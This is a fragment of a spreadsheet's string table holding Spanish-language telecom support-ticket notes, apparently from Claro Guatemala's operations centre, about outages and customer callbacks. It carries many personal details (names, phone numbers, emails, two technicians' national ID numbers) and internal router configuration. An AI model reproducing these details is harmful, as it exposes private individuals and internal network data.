    <t>F4621508</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA AROLDO PALMA-47964170 SE PROCEDE A REALIZAR PRUEBAS DE TRAZA EN ESTE MOMENTO##</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AROLDO PALMA-47964170  ##SE TIENE EN LINEA ##
2001902971
COLA:
NOMBRE: A: 47964170
NÚMERO: 47964170
DURACIÓN: 0:00:18
ESTADO: CONECTADA
DETALLES: 47964170
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 29/06/2022 10:06:52</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AROLDO PALMA-47964170  ##   NO CONTESTA ## SE INTENTARA NUEVAMENTE LUEGO ##
3001082278
COLA:
NOMBRE: A: 47964170
NÚMERO: 47964170
DURACIÓN: 0:00:23
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 47964170
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 30/06/2022 09:11:20
3001081907
COLA:
NOMBRE: A: 47964170
NÚMERO: 55280199
DURACIÓN: 0:00:15
ESTADO: CONECTADA
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 30/06/2022 09:10:38</t>
  </si>
  <si>
    <t>## SE OBSERVA EN TRAZAS QUE LLAMADA NO ENTRA A LA RED. NO SE OBSERVA EN TRAZAS- SE HA COLOCADO TRAZADOR TANTO EN EL NUMERO PILOTO + DID ##</t>
  </si>
  <si>
    <t>F4621514</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRUZ SANCHEZ 82386140 PARA SOLICITAR DATOS DE VISITA TECNICA
-ID 2001913019
NOMBRE DEL CLIENTE: BANCO DE LA PRODUCCION S.A.
UBICACIÓN:EDIFICIO CENTRAL INSS FRENTE A CEMENTERIO SAN PEDRO, MANAGUA
CONTACTO EN SITIO: HELEN SUAREZ
HORARIO DE ATENCION:8:00 - 16:00 HRS
GESTIÓN DE PERMISOS: DATOS DE PERSONAL TECNICO - CRUZSANCHEZ@BRAMPRO.COM.NI</t>
  </si>
  <si>
    <t>F4621522</t>
  </si>
  <si>
    <t>**SE LLAMA AL CLIENTE ILIANA DURAN 78504638 NO RESPONDE ENVIA DIRECTO A BUZON DE VOZ ||
SE INTENTARA LUEGO **
ID 2001934974
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ILIANA DURAN 78504638 RESPONDE DANIELA MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001992718 - 2001992974</t>
  </si>
  <si>
    <t>F4621525</t>
  </si>
  <si>
    <t>SE LE BRINDA CONTACTO DE EJECUTIVA MARIELA DONIS MARROQUIN 42105004 A CLIENTE WILMER DE LEON CON QUIEN DARÁ SEGUIMIENTO. CLIENTE AUTORIZA EL CIERRE DEL CASO. ID: 2001936288</t>
  </si>
  <si>
    <t>CLIENTE WILMER DE LEON 59528185 APOYA UBICANDO SU PLANTA PBX, LA REINICIA PERO INCONVENIENTE PERSISTE, SE OBSERVA PBX REGISTRADO EN CENTRAL PERO AL LLAMAR NO DA TONO. CLIENTE INDICA QUE TAMPOCO TIENE LLAMADAS INTERNAS. SE LE EXPLICA AL CLIENTE QUE DEBE ESCALAR EL INCONVENIENTE CON SU PROVEEDOR DE LA PBX YA QUE POSIBLEMENTE SE HAYA DESCONFIGURADO. A NIVEL DE CLARO NO SE OBSERVA INCONVENIENTE. SE LE ESTÁ APOYANDO A UBICAR A SU EJECUTIVO DE CUENTA. ID:2001924167</t>
  </si>
  <si>
    <t>F4621528</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  DAIRIN - 56395586 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001919978</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AMALIA REYES 45707476 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO DE PR DAIRIN - 56395586
-ID 20019181776</t>
  </si>
  <si>
    <t>F4621539</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS REY 49358001 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001927506</t>
  </si>
  <si>
    <t>SE LLAMA A CONTACTO DE CLIENTE 22259499 CENTRAL ATIENDE JORGE FAJARDO, QUIEN CONFIRMA QUE EL SERVICIO YA SE ENCUENTRA OPERATIVO
REPORTE::::: CAIDA TOTAL
CAUSA RAIZ:: EL SERVICIO ESTUVO AFECTADO POR CTC CLIENTE DESCONFIGURADO
SOLUCION:::: PERSONAL TECNICO ALEX, QUIEN INDICA QUE VERIFICA LINK DE FIBRA EN SITIO DE CLIENTE, AL VERIFICAR SE BOSERVA QUE EN EFECTO SI HAY LINK DE FIBRA Y LO QUE SE TENIA ERA EL CTC DEL CLIENTE DESCONFIGURADO, SE CONFIGURA Y LUEGO DE ESO EL SERVICIO YA SE ENCUENTRA OPERATIVO Y ESTABLE
3001032864
COLA:
NOMBRE: A: 22259499
NÚMERO: 22259499
DURACIÓN: 0:02:23
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 22259499
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 29/06/2022 17:38:37</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS REY AL 49358001 NO RESPONDE || SE INTENTARA LUEGO**
-ID 2001946124
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS REY 49358001 MENCIONA QUE EL DIA LUNES PRESENTARON PROBLEMA DE ENERGIA ADICIONAL INDICA QUE YA APLICARON REINICIO PERO EL INCONVENIENTE PERSISTE
-ID 2001957474
NOMBRE DEL CLIENTE: FUNDACION INTERNACIONAL PARA LA ASISTENCIA COMUNITARIA (FINCA GUATEMAL
UBICACIÓN:6 C. 5-29 Z.2 SANTA CRUZ DEL QUICHE SAN MIGUEL USPANTAN
CONTACTO EN SITIO: LUIS REY 49358001
HORARIO DE ATENCION: 8:00 - 18:00 HRS
GESTIÓN DE PERMISOS: DATOS DE PERSONAL TECNICO -- SOPORTE@FINCA.COM.GT</t>
  </si>
  <si>
    <t>SEGUIMIENTO CON TÉCNICO ASIGNADO; ADICIONAL SE HABLÓ CON JORGE FAJARDO/CLIENTE 22259499 Y SE LE BRINDAN AVANCES DEL TICKET.</t>
  </si>
  <si>
    <t>F4621543</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BELTER CANEL 40652115 MENCIONA QUE PRESENTARON 2 BAJONES DE ENERGIA ELECTRICA, CLIENTE CONFIRMA QUE YA APLICO REINICIO PERO NO RESTABLECE, SE SOLICITA DATOS DE VISITA
-ID 2001916639
NOMBRE DEL CLIENTE: COMERCIAL MAYORISTA, S.A
UBICACIÓN:BARRIO BUENA VISTA, LA LIBERTAD ZONA 0 PETEN
CONTACTO EN SITIO: BELTER CANEL - 40652115
HORARIO DE ATENCION:HASTA LAS 17 HRS
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4621544</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE SRITA. HERNANDEZ 31564431 MENCIONA QUE SE PUEDE REALIZAR LA VISITA EL VIERNES A LAS 8:00 HRS PORQUE MAÑANA NO APERTURAN EN PR
-ID 3001033690 - 3001034096</t>
  </si>
  <si>
    <t>F4621556</t>
  </si>
  <si>
    <t>SE LE  LLAMA A CLIENTE JUAN CARLOS ROBLES MÉRIDA 58794781 ID: 2001928636
CONFIRMA SERVICIO OK, AUTORIZA CIERRE DE TKT | SE NOTIFICA A JAIMEJ.HERNANDEZ VIA SKYPE | WIP
SE TERMINARA DE VALIDAR MEDIANTE SD</t>
  </si>
  <si>
    <t>F4621562</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE ERICK JOSÉ MONTEJO CRÚZ 58064113 ID: 2001930558 /
CL COMENTA QUE NO HAY ENERGIA EN EL S ITIO | SE NOTIFICA A JHONNSER.ESCOBAR VIA SKYPE | SE TERMINARA DE VALIDAR CON CENTRAL MEDIANTE SD | WIP</t>
  </si>
  <si>
    <t>F4621563</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS RODRIGUEZ 78843777- 23939601 MENCIONA QUE VAN A ESCALAR Y REVISAR INTERNAMENTE O VAN A ESCALAR CON OTRO PROVEEDOR
SE LE MENCIONA A CLIENTE QUE A NIVEL DE CLARO TODO ESTA FUNCIONANDO DE MANERA CORRECTA
-ID 3001382976 - 3001383231</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS RODRIGUEZ 78843777 INDICA QUE EL INCONVENIENTE ES CON ALGUNAS IP NADA MAS QUE YA REVISO INTERNAMENTE EL PROBLEMA PERO NO ES PROBLEMA INTERNO YA QUE SOLO SON ALGUNOS DOMINIOS QUE NO LE CONECTAN || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID3001008392
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS RODRIGUEZ 78843777 QUIEN SOLICITA LLAMADA EN 30 MIN
-ID 2001956118</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS RODRIGUEZ 78843777 MENCIONA QUE NO SE ENCUENTRA EN LA OFICINA POR LO QUE SOLICITA LLAMADA A LAS 17:30
-ID 3001201724</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS RODRIGUEZ AL 78843777 INDICA QUE VA MANEJANDO QUE SE LE LLAME EN 1 HR NUEVEMANTE**
-ID 2001931041
**</t>
  </si>
  <si>
    <t>F4621564</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ANA MAROLES AL 40208078 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001917192
**</t>
  </si>
  <si>
    <t>F4621565</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR RENATO RIOS ARQUETA 5806 4113 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001928811
**</t>
  </si>
  <si>
    <t>F4621567</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  YOHANI ALFARO 76488878 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 2001927373
**</t>
  </si>
  <si>
    <t>F4621568</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JESSICA MARÍA LÓPEZ  AL 42373696 INDICA QUE NO CUENTAN CON ENERGIA ELECTRICA EN EL SITIO **
-ID 2001918798
**</t>
  </si>
  <si>
    <t>F4621570</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE PERO NO HUBO RESPUESTA- SE PROCEDE A VALIDAR MEDIANTE CORREO--
RE: 6347 - PALACE || ID 1041874 || ENLACE INACTIVO PARA BANCO AZTECA</t>
  </si>
  <si>
    <t>F4621579</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS RIOS AL 22746525 INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO QUE HA ESTADO MUY INESTABLE INDICA QUE LA ULTIMA CAIDA FUE A LAS 7:30 AM || SE CONTACTA A GESTOR Y SE DEJA EN LIENA CON CLIENTE
-ID 2001921215
**</t>
  </si>
  <si>
    <t>F4621581</t>
  </si>
  <si>
    <t>SE LLMA A CLIENTE ESTUARDO CHOC-47691993 MENCIONA QUE NO LOGRA UBICAR LOS EQUIPOS PARA PODERLOS REINICIAR
CLIENTE SOLICITA VISITA TECNICA, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001935342</t>
  </si>
  <si>
    <t>-* ESTUARDO CHOC-47691993 (CLIENTE) ENTERADO DE LA CANALIZACIÓN,  INFORMA QUE YA LOS TEC LE INFORMARON E INICIARA LOS TRAMITES PARA LAS REPARACIONES CORRESPONDIENTES Y NOS NOTIFICARÁ AL HABER CONCLUIDO POR LO QUE AUTORIZA CIERRE -*
-*</t>
  </si>
  <si>
    <t>SE HABLA CONC LIENTE- CLIENTE UBICA EQUPO PERO INDICAQ EU SE LE DEVUELVA LLAMDAA EN 30 MINUTOS ###</t>
  </si>
  <si>
    <t>SE LLAMA ALCIENTE ESTUARDO CHOC-47691993 3 VECES ## NO CONTESTA ##ENVIA A BUZON## SE INTENTARA LUEGO
2001932396
COLA:
NOMBRE: A: 47691993
NÚMERO: 47691993
DURACIÓN: 0:00:33
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 47691993
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 29/06/2022 11:36:26
2001932557
COLA:
NOMBRE: A: 47691993
NÚMERO: 011 50255970000
DURACIÓN: 0:00:30
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: +50255970000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 29/06/2022 11:36:3
2001932687
COLA:
NOMBRE: A: 47691993
NÚMERO: 011 50255970000
DURACIÓN: 0:00:39
ESTADO: CONECTADA
DETALLES: +50255970000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 29/06/2022 11:36:41</t>
  </si>
  <si>
    <t>SE LLAMA ALCIENTE ESTUARDO CHOC-47691993
2001932396
COLA:
NOMBRE: A: 47691993
NÚMERO: 47691993
DURACIÓN: 0:00:11
ESTADO: MARCANDO
DETALLES: 47691993
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 29/06/2022 11:35:06</t>
  </si>
  <si>
    <t>SE LLAMA A LICENTE ESTUARDO CHOC-47691993 ## SE TIENE EN LINEA ##
2001914811
COLA:
NOMBRE: A: 47691993
NÚMERO: 47691993
DURACIÓN: 0:00:16
ESTADO: CONECTADA
DETALLES: 47691993
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 29/06/2022 10:41:36</t>
  </si>
  <si>
    <t>F4621595</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SCARLED STEFANI MANZANERO  AL 4175 3805 SOLICITA QUE SE LE LLAME EN 15 MIN NUEVAMENTE PARA CONFIRMAR **
-ID 2001925185
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  SCARLED STEFANI MANZANERO  41753805  QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001934434</t>
  </si>
  <si>
    <t>F4621600</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE AXEL ESTUARDO RECINOS NATARENO 40138806 ID: 2001947680
CONFIRMA SERVICIO OK, AUTORIZA CIERRE | SE NOTIFICA A WAGNER.POLANCO VIA SKYPE | WIP
SE TERMINARA DE VALIDAR MEDIANTE SD</t>
  </si>
  <si>
    <t>F4621607</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL ALBERTO GARCÍA 45836146 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 2001941412</t>
  </si>
  <si>
    <t>F4621610</t>
  </si>
  <si>
    <t>NO APLICA PC, FAVIOR VERIFICAR CRONO ANTERIOR | SE NOTIFICA A JURGEN.BOCH VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>F4621613</t>
  </si>
  <si>
    <t>SE LLAMA A MONITOREO DE CAJERO 5B ATIENDE ANTONY GARCIA QUIEN INDICA QUE TIENEN INCONVENIENTES DE ENERGÍA EN EL SECTOR
RESULTADO: LLAMADA HECHA
NOMBRE: 24207210
NÚMERO: 24207210
INICIO: HOY, 11:35
FIN: HOY, 11:44
DURACIÓN: 8:47
ID DE LLAMADA: 2001932485</t>
  </si>
  <si>
    <t>F4621614</t>
  </si>
  <si>
    <t>GESTION DE ACCESOS F4621614 | 897400008T | ACEROS DE GUATEMALA, S.A. . INTERNET_AVENIDA PETAPA 51-84 ZONA 12 GUATEMALA
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:MSAMAYOA@CORPORACIONAG.COM;DREVOLORIO@CORPORACIONAG.COM
CC:CNOCCA;GRUPO N1
MIÉ 29/06/2022 13:17
BUEN DÍA ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO F4621614 | 897400008T | ACEROS DE GUATEMALA, S.A. . INTERNET_AVENIDA PETAPA 51-84 ZONA 12 GUATEMALA
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
NOMBRE                                                                      IBM                        DPI
ERWIN EDUARDO DEL CID DUBON                                 52522         1981 48798 0101
 HECTOR MISAEL RAMIREZ CARDONA                             710195         2249 23862 0101
QUEDAMOS ATENTOS A SUS COMENTARIOS</t>
  </si>
  <si>
    <t>F4621619</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE MARLON HERNANDEZ 45174002 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
SE REALIZA UNA LLAMADA DE PRUEBA, CLIENTE CONFIRMA
-ID 2001939071 - 2001939289 - 2001940331</t>
  </si>
  <si>
    <t>F4621621</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 78551731  NO RESPONDE, SE INTENTARA LUEGO
-ID 2001943239</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 78551731 CONTESTA EL SEÑOR  WILFREDO CONFIRMA SERVICIO ESTABLE Y
OPERATIVO**
-ID 2001955834 - 2001957719
**</t>
  </si>
  <si>
    <t>F4621622</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE RONALD SALGUERO 31892608  MENCIONA QUE LA IP QUE ESTAN UTILIZANDO ES 181.209.242.174 PERO PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001928536</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RONALD SALGUERO 31892608 MENCIONA QUE ESTARA REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 8:00 HRS
-ID 2001945656</t>
  </si>
  <si>
    <t>F4621630</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 29 DE JUNIO DE 2022 17:35
PARA: LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; 'NOE PEREZ (VENDOR)' &lt;NOE.PEREZ1@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: 'CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA' &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE WALMART LA LIMA ID: CONTR0001684079OC
*-*-*-*</t>
  </si>
  <si>
    <t>CASO ESCALADO CON PERSONAL DE UFINET PARA VERIFICAR AFECTACIÓN REPORTADA; CNOC CLARO YA ENVIÓ SEGUIMIENTO A CLIENTE VÍA CORREO.</t>
  </si>
  <si>
    <t>F4621634</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS##
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 29 DE JUNIO DE 2022 15:35
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; NOE PEREZ (VENDOR) &lt;NOE.PEREZ1@WALMART.COM&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF LO DE CARRANZA  ID: 344400228
BUEN DÍA ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO 344400228T |OPERADORA DE TIENDAS  S.A.. |DF LO DE CARRANZA GRANJA EL REFUGIO CALLE PRINCIPAL CARRANZA SAN JUAN SACATEPEQUEZ
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICO: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S COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ATIENDE GERALD  COMENTA QUE YA CUENTA CON SERVICIO, VALIDA SERVICIO ESTABLE Y OPERATIVO
3001043618
COLA:
NOMBRE: A: 22437253
NÚMERO: 22437253
DURACIÓN: 0:03:10
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 22437253
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 29/06/2022 18:48:25</t>
  </si>
  <si>
    <t>F4621648</t>
  </si>
  <si>
    <t>SE MLLAMA A CLIENTE NORMA 95950021 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE LE INDICA QUE A NIVEL DE CLARO EL SERVICIO SE OBSERVA OPERATIVO
CLIENTE SOLICITA LLAMADA PARA LAS  15:0 HRS
-ID 2001951278</t>
  </si>
  <si>
    <t>F4621665</t>
  </si>
  <si>
    <t>CLIENTE HERBERT CHAVEZ COMENTA QUE HA PRESENTADO PROBLEMAS AÚN CON LLAMADAS SIN AUDIO. SE LE COMENTA QUE SE ESTUVO MONITOREANDO AYER Y EL DIA DE HOY EN HORARIO DE 11:00 A 11:30 AM, SE LE INDICA QUE EL DÍA DE AYER SE TUVO DOS LLAMADAS CON PROBLEMA, Y EL DÍA DE HOY NO SE TUVIERON PROBLEMAS, SEGÚN LLAMADAS REALIZADAS AL 23203434 Y SEGÚN COMENTAN LOS AGENTES DE POLLO BRUJO. CLIENTE SOLICITA SE MONITOREE MAÑANA EN EL MISMO HORARIO Y LLAMARLO EL DÍA LUNES PARA VALIDAR. DE CX ESTUVO APOYANDO JORGE CHAVARRIA. ID DE LLAMADA: 3001328671</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HERBER CHAVEZ 31288921 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001725225</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HERBER CHAVEZ AL 31288921  - INDICA QUE SIEMPRE SE DIO EL PROBLEMA A LAS 13:30 HRS INDICA QUE NOSOTROS ESTAMOS LLAMANDO AL NUMERO 23203400 Y SOLICITA QUE SE VERIFIQUE EL 23203434 DE ESE QUE SE REVISE EL RST Y QUE SE VALIDE EL INCONVENIENTE NUEVAMENTE MAÑANA A LAS 11:00 A 11:10 AM  QUE ES LA HORA QUE LE DA EL PROBLEMA|| SE NOTIFICA A GESTOR **
-ID 3001013254
**</t>
  </si>
  <si>
    <t>F4621666</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BANIRA CHOC AL 58330975 NO RESPONDE ENVIA DIRECTO A BUZON ||
SE INTENTARA LUEGO **
-ID 2001961487
**</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CLIENTE SR. DAVID, SE VALIDA QUE ESTE ENLACE NO TIENE LA RUTA ESTATICA DE SU LAN:
&lt;VCOBGTCON1T1B09A02EIM3&gt;DISP CURR | IN 10.105.9.212
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
IP ROUTE-STATIC VPN-INSTANCE GLOBO_TELEF 10.212.187.105 255.255.255.255 10.105.9.212 DESCRIPTION MON_733900001T
SE REVISAN LOS COMMIT EL CUAL APARECE ELIMINADO HOY Y COINCIDE CON EL REPORTE DEL CLIENTE.
&lt;VCOBGTCON1T1B09A02EIM3&gt;DISP CONFIGURATION COMMIT CHANGES AT ?
  1000002212  COMMITID CREATED BY RIGONZALEZ AT 2022-06-29 10:20:48-06:00
&lt;VCOBGTCON1T1B09A02EIM3&gt;DISP CONFIGURATION COMMIT CHANGES AT 1000002212
BUILDING CONFIGURATION
  #
- IP ROUTE-STATIC VPN-INSTANCE GLOBO_TELEF 192.168.150.0 255.255.255.0 10.105.9.212 DESCRIPTION 733900001T
  #
&lt;VCOBGTCON1T1B09A02EIM3&gt;!!
SE BUSCA EN TEAMS LAS BAJAS DE HOY Y EFECTIVAMENTE APARECE EL REGRISTRO QUE ESTE ENLACE ESTA BLOQUEADO:
[10:55 AM] SANDRAV.FUENTES@CLARO.COM.GTRE: BLLQUEO CLIENTE RCN ID DE CLARO 733900001 XT C-0010110801
MUCHAS GRACIAS!
DE: ROGELIO ISMAEL GONZALEZ MARROQUIN
ENVIADO EL: MIÉRCOLES, 29 DE JUNIO DE 2022 10:24
PARA: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; ACCESOS EMPRESARIALES &lt;ACCESOSEMPRESARIALES@CLARO.COM.GT&gt;
CC: CUSTOMERBOCNOC &lt;CUSTOMERBOCNOC@CLARO.COM.GT&gt;; 'SOPORTE N1 CNOC' &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; MOISES AARON SALAZAR LECHUGA &lt;MOISES.SALAZAR@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CONF.CNOCREG &lt;CONFCNOCREG@CLARO.COM.GT&gt;;
 8CF97F6C.CLARO.COM.GT@AMER.TEAMS.MS; SANDRA VICTORIA FUENTES BOBADILLA &lt;SANDRAV.FUENTES@CLARO.COM.GT&gt;; CARINA DEL ROSARIO VELIZ BARCARCEL &lt;CARINAD.VELIZ@CLARO.COM.GT&gt;
ASUNTO: BLLQUEO CLIENTE RCN ID DE CLARO 733900001 XT C-0010110801
BUEN DÍA ESTIMADOS,
SE  PROCEDE CON EL BLOQUEO DEL SERVICIO SEGÚN LA TAREA:T1035939
.-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/-*/
10.179.28.37
&lt;VCOBGTCON1T1B09A02EIM3&gt;DIS CURR | INC 10.105.9.212
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C
 TO BREAK.
IP ROUTE-STATIC VPN-INSTANCE GLOBO_TELEF 10.212.187.105 255.255.255.255 10.105.9.212 DESCRIPTION MON_733900001T
IP ROUTE-STATIC VPN-INSTANCE GLOBO_TELEF 192.168.150.0 255.255.255.0 10.105.9.212 DESCRIPTION 733900001T
&lt;VCOBGTCON1T1B09A02EIM3&gt;
&lt;VCOBGTCON1T1B09A02EIM3&gt;SYSTE
&lt;VCOBGTCON1T1B09A02EIM3&gt;SYSTEM-VIEW
ENTER SYSTEM VIEW, RETURN USER VIEW WITH RETURN COMMAND.
[~VCOBGTCON1T1B09A02EIM3]UNDO IP ROUTE-STATIC VPN-INSTANCE GLOBO_TELEF 192.168.150.0 255.255.255.0 10.105.9.212
[*VCOBGTCON1T1B09A02EIM3]COMMIT
[~VCOBGTCON1T1B09A02EIM3]Q
&lt;VCOBGTCON1T1B09A02EIM3&gt;SAVE
WARNING: THE CURRENT CONFIGURATION WILL BE WRITTEN TO THE DEVICE.
ARE YOU SURE TO CONTINUE? [Y/N]:Y
NOW SAVING THE CURRENT CONFIGURATION TO THE SLOT 9 ....
INFO: SAVE THE CONFIGURATION SUCCESSFULLY.
NOW SAVING THE CURRENT CONFIGURATION TO THE SLOT 10 ..
SALUDOS.
&lt;HTTPS://TEAMS.MICROSOFT.COM/L/MESSAGE/19:BDF444B6E20844B986743A1568E38CDA@THREAD.TACV2/1656521753829?TENANTID=4A261F89-8EC8-47CB-9E42-747C3EB3757F&amp;AMP;GROUPID=F8DA645F-F5D9-45DD-8BAC-9A7991D49F57&amp;AMP;PARENTMESSAGEID=1656521753829&amp;AMP;TEAMNAME=CENAM GESTORES FRT&amp;AMP;CHANNELNAME=BAJAS Y SUSPENSIONES&amp;AMP;CREATEDTIME=1656521753829&gt;</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BANIRA CHOC AL 58330975 NO RESPONDE ENVIA DIRECTO A BUZON ||
SE INTENTARA LUEGO **
-ID 2001947383
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BANIRA CHOC AL 58330975 NO RESPONDE ENVIA DIRECTO A BUZON ||
SE INTENTARA LUEGO **
-ID 2001967784
**</t>
  </si>
  <si>
